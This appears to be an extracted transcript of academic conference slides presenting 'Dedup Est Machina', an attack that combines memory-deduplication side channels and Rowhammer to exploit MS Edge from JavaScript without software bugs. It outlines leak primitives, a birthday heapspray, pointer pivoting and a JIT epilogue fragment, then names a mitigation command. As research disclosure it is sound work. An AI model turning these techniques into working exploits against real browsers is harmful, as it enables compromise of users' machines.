dedup est machina memory deduplication as an advanced ... · erik bosman, kaveh razavi, herbert bos...
TRANSCRIPT
Dedup Est Machina
Memory Deduplicationas an Advanced Exploitation Vector
Erik Bosman, Kaveh Razavi, Herbert Bos and Cristiano Giuffrida
Deduplication(software side-channel)
+Rowhammer
(hardware bug)
1
Deduplication(software side-channel)
+Rowhammer
(hardware bug)
Exploit MS Edge without software bugs(from JavaScript)
1
Deduplication
- leak heap & code pointer addresses
2
Deduplication
- leak heap & code pointer addresses
+3.141592
+0.0
42.
1
NaN
JavaScript Array
2
Deduplication
- leak heap & code pointer addresses
+3.141592
+0.0
42.
1
NaN
JavaScript Array chakra.dll
2
Deduplication
- leak heap & code pointer addresses- create a fake object
3
Deduplication
Rowhammer
- leak heap & code pointer addresses- create a fake object
- create reference to our fake object
3
Deduplication
Rowhammer
- leak heap & code pointer addresses- create a fake object
- create reference to our fake object
3
deduplication side-channel attack
physical memory attacker process
victim process
4
deduplication side-channel attack
physical memory attacker process
victim process
4
deduplication side-channel attack
physical memory attacker process
victim process
4
deduplication side-channel attack
physical memory attacker process
victim process
4
deduplication side-channel attack
physical memory attacker process
victim process
** * * *
* ***
* * * * * * ** *
* * * * * * ***
4
deduplication side-channel attack
normal write
5
deduplication side-channel attack
normal write
write
5
deduplication side-channel attack
normal write
copy on write (due to deduplication)
write
*5
deduplication side-channel attack
normal write
copy on write (due to deduplication)
write
copypage contents write
*5
Can we generalize this to leaking arbitrary data, like an ASLR pointer or a password?
6
Challenge 1:
The secret we want to leak does not span an entire page.
7
turning a secret into a page
secret
8
turning a secret into a page
known data
secret
secret page8
Challenge 2:
The secret we want to leak has too much entropy to leak all at once.
9
primitive #1: alignment probing
known data
secret
secret page10
primitive #1: alignment probing
known data
secret
secret page10
primitive #2: partial reuse
known data
secret
secret page11
primitive #2: partial reuse
known data
secret
secret page11
JIT function epilogue (MS Edge)
mov RCX,0x1c20 mov RAX, [code address] jmp RAX trap
trap trap trap trap trap trap ...trap trap trap trap trap trap
trap trap
12
JIT function epilogue (MS Edge)
mov RCX,0x1c20 mov RAX, [code address] jmp RAX trap
trap trap trap trap trap trap
trap
trap trap trap trap trap trap
trap trap trap trap trap trap
trap trap trap trap trap
trap trap
12
JIT function epilogue (MS Edge)
mov RCX,0x1c20 mov RAX, [code address] jmp RAX trap
trap trap trap trap trap trap
trap
trap trap trap trap trap trap
trap trap trap trap trap trap
trap trap trap trap trap
trap
12
JIT function epilogue (MS Edge)
mov RCX,0x1c20 mov RAX, [code address] jmp RAX trap
trap trap trap trap trap trap
trap
trap trap trap trap trap trap
trap trap trap trap trap trap
trap trap trap trap trap
12
But what if we can't leak part of the secret?
13
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
birthday problem
14
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
victim memory
15
primitive #3: birthday heapspray
physical memory attacker memory
*victim memory
*
15
pointer pivotting
arraydata
16
pointer pivotting
arraydata
arrayheader
JavaScript Array
16
pointer pivotting
arraydata
arrayheader
arrayheader
arraydata
JavaScript Array JavaScript Array
16
pointer pivotting
arraydata
arrayheader
arrayheader
arraydata
JavaScript Array JavaScript Array
16
pointer pivotting
arraydata
arrayheader
arrayheader
arraydata
JavaScript Array JavaScript Array
16
rowhammer attack
DDR memory
rows
17
rowhammer attack
DDR memory
rowactivation
17
rowhammer attack
DDR memory
rowactivation
17
rowhammer attack
DDR memory
rowactivation
17
pointer pivotting
arraydata
arrayheader
arrayheader
arraydata
JavaScript Array JavaScript Array
18
pointer pivotting
arraydata
arrayheader
arrayheader
arraydata
JavaScript Array JavaScript Array
18
in short:
- Memory deduplication is a more powerfulside-channel than previously thought.
- Reliable browser exploitation usingrowhammer in JavaScript is possible.
(on Windows 10, MS Edge, without using any bugs)
> Disable-MMAgent -PageCombining
19